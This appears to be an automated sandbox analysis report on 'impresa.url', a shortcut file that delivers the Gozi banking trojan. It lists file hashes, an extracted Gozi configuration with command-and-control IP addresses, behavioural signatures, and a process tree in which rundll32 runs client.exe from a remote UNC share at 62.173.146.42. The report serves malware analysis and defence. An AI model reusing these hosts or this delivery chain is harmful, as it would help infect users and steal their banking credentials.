Analysis
-
max time kernel
143s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2023 11:05
Static task
static1
Behavioral task
behavioral1
Sample
impresa.url
Resource
win7-20230831-en
General
-
Target
impresa.url
-
Size
192B
-
MD5
52aa02b4f67f2f504fcb991e6d094e58
-
SHA1
87e772a1597eba6b20bb750fd79c9ac30738229a
-
SHA256
8bb04ebea49b92e090b777efedfa44c8aa881a5531a0791f7f2404d0d50f9963
-
SHA512
e5baa8bbce30f1ca6c64705b9145454857c02f2a27308fc27b07c145517cbd3ccbde2cb57f94459df9fe4311a82cb3607f097a6219286f1d9eca44b953d54be4
Malware Config
Extracted
gozi
Extracted
gozi
5050
46.8.210.250
31.41.44.9
185.247.184.139
62.72.33.155
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral2/memory/1616-1-0x0000000000CC0000-0x0000000000CCC000-memory.dmp dave -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 2212 wrote to memory of 1616 2212 rundll32.exe client.exe PID 2212 wrote to memory of 1616 2212 rundll32.exe client.exe PID 2212 wrote to memory of 1616 2212 rundll32.exe client.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\impresa.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2212 -
\??\UNC\62.173.146.42\scarica\client.exe"\\62.173.146.42\scarica\client.exe"2⤵PID:1616
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1616-1-0x0000000000CC0000-0x0000000000CCC000-memory.dmpFilesize
48KB
-
memory/1616-0-0x0000000000CD0000-0x0000000000CDF000-memory.dmpFilesize
60KB
-
memory/1616-5-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/1616-11-0x00000000028C0000-0x00000000028CD000-memory.dmpFilesize
52KB